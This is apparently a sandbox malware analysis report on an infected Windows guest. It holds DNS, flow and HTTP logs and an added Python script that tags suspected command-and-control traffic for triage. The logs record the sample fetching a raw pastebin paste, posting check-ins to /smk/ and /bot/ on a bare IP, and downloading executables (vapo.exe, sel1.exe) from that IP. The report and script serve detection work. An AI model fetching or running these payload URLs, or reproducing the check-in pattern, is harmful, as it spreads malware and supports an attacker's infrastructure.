Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
visualstudio.microsoft.com | CNAME e19210.b.akamaiedge.net | 23.49.147.165 |
pastebin.com | 104.20.4.235 | |
support.microsoft.com | 13.107.246.74 | |
windowsupdate.microsoft.com | 20.109.209.108 | |

TCP Requests
- 192.168.56.103:49165 -> 121.254.136.107:80
- 192.168.56.103:49168 -> 13.107.246.74:443 (support.microsoft.com)
- 192.168.56.103:49169 -> 13.107.246.74:443 (support.microsoft.com)
- 192.168.56.103:49170 -> 13.107.246.74:443 (support.microsoft.com)
- 192.168.56.103:49171 -> 13.107.246.74:443 (support.microsoft.com)
- 192.168.56.103:49174 -> 13.107.246.74:443 (support.microsoft.com)
- 192.168.56.103:49175 -> 13.107.246.74:443 (support.microsoft.com)
- 192.168.56.103:49179 -> 13.107.246.74:443 (support.microsoft.com)
- 192.168.56.103:49180 -> 13.107.246.74:443 (support.microsoft.com)
- 192.168.56.103:49193 -> 172.67.19.24:443 (pastebin.com)
- 192.168.56.103:49176 -> 18.230.108.113:80
- 192.168.56.103:49181 -> 18.230.108.113:80
- 192.168.56.103:49190 -> 18.230.108.113:80
- 192.168.56.103:49189 -> 20.72.235.82:80 (windowsupdate.microsoft.com)
- 192.168.56.103:49167 -> 23.45.53.206:80
- 192.168.56.103:49172 -> 23.74.20.243:443 (visualstudio.microsoft.com)
- 192.168.56.103:49173 -> 23.74.20.243:443 (visualstudio.microsoft.com)
- 192.168.56.103:49177 -> 23.74.20.243:443 (visualstudio.microsoft.com)
- 192.168.56.103:49178 -> 23.74.20.243:443 (visualstudio.microsoft.com)

UDP Requests
- 192.168.56.103:50800 -> 164.124.101.2:53 (DNS)
- 192.168.56.103:52760 -> 164.124.101.2:53 (DNS)
- 192.168.56.103:53673 -> 164.124.101.2:53 (DNS)
- 192.168.56.103:56613 -> 164.124.101.2:53 (DNS)
- 192.168.56.103:62576 -> 164.124.101.2:53 (DNS)
- 192.168.56.103:64178 -> 164.124.101.2:53 (DNS)
- 192.168.56.103:64894 -> 164.124.101.2:53 (DNS)
- 192.168.56.103:137 -> 192.168.56.255:137 (NetBIOS name service, subnet broadcast)
- 192.168.56.103:138 -> 192.168.56.255:138 (NetBIOS datagram service, subnet broadcast)
- 192.168.56.103:49154 -> 239.255.255.250:1900 (SSDP multicast)

HTTP Requests

GET 200 https://pastebin.com/raw/djZsmRNC
Request:
GET /raw/djZsmRNC HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07:51:17 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 570
Last-Modified: Mon, 27 Jan 2025 07:41:47 GMT
Server: cloudflare
CF-RAY: 9087281be8fffcd0-FUK

GET 200 http://www.bing.com/
Request:
GET / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.bing.com

Response:
HTTP/1.1 200 OK
Content-Length: 131542
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0
X-EventID: 67973aac2d8d4c2aa02a3ba23852f09f
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=9
Date: Mon, 27 Jan 2025 07:50:04 GMT
Connection: keep-alive
Set-Cookie: MUID=2BAA570B3E476BFB3567428A3FF26AA1; domain=.bing.com; expires=Sat, 21-Feb-2026 07:50:04 GMT; path=/
Set-Cookie: MUIDB=2BAA570B3E476BFB3567428A3FF26AA1; expires=Sat, 21-Feb-2026 07:50:04 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=24F8CD0A8D45640C152DD88B8CF06584; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Sat, 21-Feb-2026 07:50:04 GMT; path=/; HttpOnly
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Wed, 27-Jan-2027 07:50:04 GMT; path=/
Set-Cookie: SRCHUID=V=2&GUID=4D1D55BF35AA4437BEE006E67D9D5233&dmnchg=1; domain=.bing.com; expires=Wed, 27-Jan-2027 07:50:04 GMT; path=/
Set-Cookie: SRCHUSR=DOB=20250127; domain=.bing.com; expires=Wed, 27-Jan-2027 07:50:04 GMT; path=/
Set-Cookie: SRCHHPGUSR=SRCHLANG=ko&IG=87B31E54FB904F7582F74907D765829E; domain=.bing.com; expires=Wed, 27-Jan-2027 07:50:04 GMT; path=/
Set-Cookie: _SS=SID=24F8CD0A8D45640C152DD88B8CF06584; domain=.bing.com; path=/
X-CDN-TraceID: 0.6788fe79.1737964204.14e5ba3d

GET 302 http://go.microsoft.com/fwlink/?LinkId=249109
Request:
GET /fwlink/?LinkId=249109 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com

Response:
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://support.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:04 GMT
Connection: keep-alive

GET 302 http://go.microsoft.com/fwlink/?LinkId=249109
Request:
GET /fwlink/?LinkId=249109 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com

Response:
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://support.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:08 GMT
Connection: keep-alive

GET 302 http://go.microsoft.com/fwlink/?LinkId=133405
Request:
GET /fwlink/?LinkId=133405 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com

Response:
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://visualstudio.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:12 GMT
Connection: keep-alive

GET 302 http://go.microsoft.com/fwlink/?LinkId=249109
Request:
GET /fwlink/?LinkId=249109 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com

Response:
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://support.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:15 GMT
Connection: keep-alive

POST 404 http://18.230.108.113/smk/
Request:
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113

Response:
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:19 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1251

GET 302 http://go.microsoft.com/fwlink/?LinkId=133405
Request:
GET /fwlink/?LinkId=133405 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com

Response:
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://visualstudio.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:22 GMT
Connection: keep-alive

GET 302 http://go.microsoft.com/fwlink/?LinkId=249109
Request:
GET /fwlink/?LinkId=249109 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: go.microsoft.com

Response:
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Server: Kestrel
Location: https://support.microsoft.com/
Request-Context: appId=cid-v1:d94c0f68-64bf-4036-8409-a0e761bb7ee1
X-Response-Cache-Status: True
Expires: Mon, 27 Jan 2025 07:50:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 27 Jan 2025 07:50:26 GMT
Connection: keep-alive

POST 404 http://18.230.108.113/smk/
Request:
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113

Response:
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:34 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251

GET 200 http://18.230.108.113/vapo.exe
Request:
GET /vapo.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 18.230.108.113

Response:
HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07:50:34 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
Last-Modified: Wed, 22 Jan 2025 15:21:16 GMT
ETag: "10000002cbf7b-8200-62c4d0b721e7f"
Accept-Ranges: bytes
Content-Length: 33280
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdownload

POST 404 http://18.230.108.113/smk/
Request:
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113

Response:
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:35 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 471
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251

POST 404 http://18.230.108.113/smk/
Request:
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113

Response:
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:35 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 50
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251

GET 200 http://18.230.108.113/files/sel1.exe
Request:
GET /files/sel1.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 18.230.108.113

Response:
HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07:50:35 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
Last-Modified: Wed, 22 Jan 2025 15:48:52 GMT
ETag: "200000031146a-2800-62c4d6e29fb8a"
Accept-Ranges: bytes
Content-Length: 10240
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: application/x-msdownload

POST 404 http://18.230.108.113/smk/
Request:
POST /smk/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 63
Host: 18.230.108.113

Response:
HTTP/1.1 404 Not Found
Date: Mon, 27 Jan 2025 07:50:36 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 471
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251

GET 302 http://windowsupdate.microsoft.com/
Request:
GET / HTTP/1.0
User-Agent: Mozilla/4.0
Host: windowsupdate.microsoft.com
Connection: close

Response:
HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: http://fe2.update.microsoft.com/
Server: Microsoft-IIS/10.0
Date: Mon, 27 Jan 2025 07:50:46 GMT
Connection: close
Content-Length: 155

POST 200 http://18.230.108.113/bot/
Request:
POST /bot/ HTTP/1.0
User-Agent: Mozilla/4.0
Host: 18.230.108.113
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 26

Response:
HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07:50:48 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Cache-Control: no-cache
Content-Disposition: attachment; filename=202
Content-Transfer-Encoding: binary
Content-Length: 420356
Connection: close
Content-Type: application/octet-stream
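
The records above fall into two groups. One is redirect and landing-page traffic to go.microsoft.com, www.bing.com, windowsupdate.microsoft.com and the Microsoft hosts they point at. The other is a sequence against 18.230.108.113, addressed by bare IP in the Host header with no name for it in the DNS table: five POST /smk/ form submissions answered with 404 pages whose bodies differ in size (44, 50 and 471 bytes, one chunked), two application/x-msdownload downloads (/vapo.exe, 33280 bytes, and /files/sel1.exe, 10240 bytes), and a POST /bot/ sent over HTTP/1.0 with a different User-Agent (Mozilla/4.0) that is answered with a 420356-byte application/octet-stream attachment named 202. The 404 status on /smk/ is not evidence that the endpoint is unused, since the bodies vary and the later POST /bot/ to the same server succeeds. The run opens with a raw fetch from pastebin.com, a pattern often used to pull C2 configuration from a paste. Neither Suricata nor Snort alerted on any of it. The script below is an added example, not part of the sandbox output: it parses request and response heads like the ones shown into fields and applies those observations as heuristics (bare-IP Host, form POST, executable or attachment reply, HTTP/1.0 client, paste-site fetch, distinct User-Agents per host). The sample records are constructed from the report's headers and trimmed to what the heuristics read; the tag names, the PASTE_SITES list and the c2_candidate combination rule are this example's own.

```python
"""Heuristic triage of sandbox HTTP records (added example, not sandbox output).

Sample records are constructed from headers shown in the report above; tag names,
PASTE_SITES and the c2_candidate rule are this example's own assumptions.
"""
from ipaddress import ip_address

# Constructed from the report: five transactions as "<request head>\r\n\r\n<response head>".
SAMPLE_TRANSACTIONS = [
    "GET /raw/djZsmRNC HTTP/1.1\r\nHost: pastebin.com\r\nConnection: Keep-Alive\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/plain; charset=utf-8\r\nServer: cloudflare\r\n",
    "POST /smk/ HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"
    "Content-Length: 63\r\nHost: 18.230.108.113\r\n\r\n"
    "HTTP/1.1 404 Not Found\r\nX-Powered-By: PHP/5.2.8\r\nContent-Length: 471\r\n"
    "Content-Type: text/html; charset=windows-1251\r\n",
    "GET /vapo.exe HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"
    "Host: 18.230.108.113\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Length: 33280\r\nContent-Type: application/x-msdownload\r\n",
    "POST /bot/ HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\nHost: 18.230.108.113\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 26\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Disposition: attachment; filename=202\r\n"
    "Content-Length: 420356\r\nContent-Type: application/octet-stream\r\n",
    "GET /fwlink/?LinkId=249109 HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"
    "Host: go.microsoft.com\r\n\r\n"
    "HTTP/1.1 302 Moved Temporarily\r\nLocation: https://support.microsoft.com/\r\n",
]

PASTE_SITES = {"pastebin.com"}  # assumption: extend with other paste/dead-drop hosts


def parse_headers(block):
    """Split one HTTP message head into its first line and a lower-cased header dict."""
    lines = block.strip("\r\n").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_transaction(raw):
    """Parse a request head, a blank line and the response head into one record."""
    req_raw, resp_raw = raw.split("\r\n\r\n", 1)
    req_line, req_h = parse_headers(req_raw)
    resp_line, resp_h = parse_headers(resp_raw)
    method, path, version = req_line.split(" ", 2)
    return {"method": method, "path": path, "version": version,
            "status": int(resp_line.split(" ", 2)[1]),
            "host": req_h.get("host", ""), "req": req_h, "resp": resp_h}


def is_bare_ip(host):
    """True when the Host header is an IP literal (optionally IPv4:port), i.e. no DNS name."""
    candidate = host.split(":")[0] if host.count(":") == 1 else host
    try:
        ip_address(candidate)
    except ValueError:
        return False
    return True


def classify(tx):
    """Return the set of heuristic tags for one transaction."""
    tags = set()
    req_ct = tx["req"].get("content-type", "")
    resp_ct = tx["resp"].get("content-type", "")
    if is_bare_ip(tx["host"]):
        tags.add("bare_ip_host")
    if tx["method"] == "POST" and "x-www-form-urlencoded" in req_ct:
        tags.add("form_post")
    if "application/x-msdownload" in resp_ct or tx["path"].lower().endswith(".exe"):
        tags.add("exe_download")
    if "attachment" in tx["resp"].get("content-disposition", "") and "octet-stream" in resp_ct:
        tags.add("binary_attachment")
    if tx["host"].lower() in PASTE_SITES:
        tags.add("paste_site_fetch")
    if tx["version"] == "HTTP/1.0":
        tags.add("http10_client")
    # Combination rule (this example's own): a form POST or a binary "attachment" reply
    # from a server addressed by bare IP is treated as a C2 check-in candidate.
    if "bare_ip_host" in tags and tags & {"form_post", "binary_attachment"}:
        tags.add("c2_candidate")
    return tags


def host_summary(txs):
    """Aggregate per Host: request count, distinct User-Agents, union of tags, payload URLs."""
    out = {}
    for tx in txs:
        h = out.setdefault(tx["host"], {"requests": 0, "user_agents": set(),
                                        "tags": set(), "payload_urls": []})
        tags = classify(tx)
        h["requests"] += 1
        h["user_agents"].add(tx["req"].get("user-agent", ""))
        h["tags"] |= tags
        if tags & {"exe_download", "binary_attachment"}:
            # Scheme is not in the message head; http is assumed (the report's port-80 flows).
            h["payload_urls"].append(f"http://{tx['host']}{tx['path']}")
    return out


def triage(raws=SAMPLE_TRANSACTIONS):
    """Parse the raw records and return the per-host summary."""
    return host_summary([parse_transaction(r) for r in raws])


if __name__ == "__main__":
    for host, info in triage().items():
        print(f"{host:24} requests={info['requests']} user_agents={len(info['user_agents'])} "
              f"tags={','.join(sorted(info['tags'])) or '-'} payloads={info['payload_urls']}")
```

Run directly to print one line per host; 18.230.108.113 comes out with three requests, two distinct User-Agents, the c2_candidate tag and both payload URLs, while the Microsoft and pastebin hosts carry at most the paste_site_fetch tag. In a real workflow feed it the full record list (or a proxy or pcap export converted to the same head format) and add environment-specific checks, for instance cross-referencing Host against the DNS table so that connections with no preceding lookup are flagged on their own.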
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts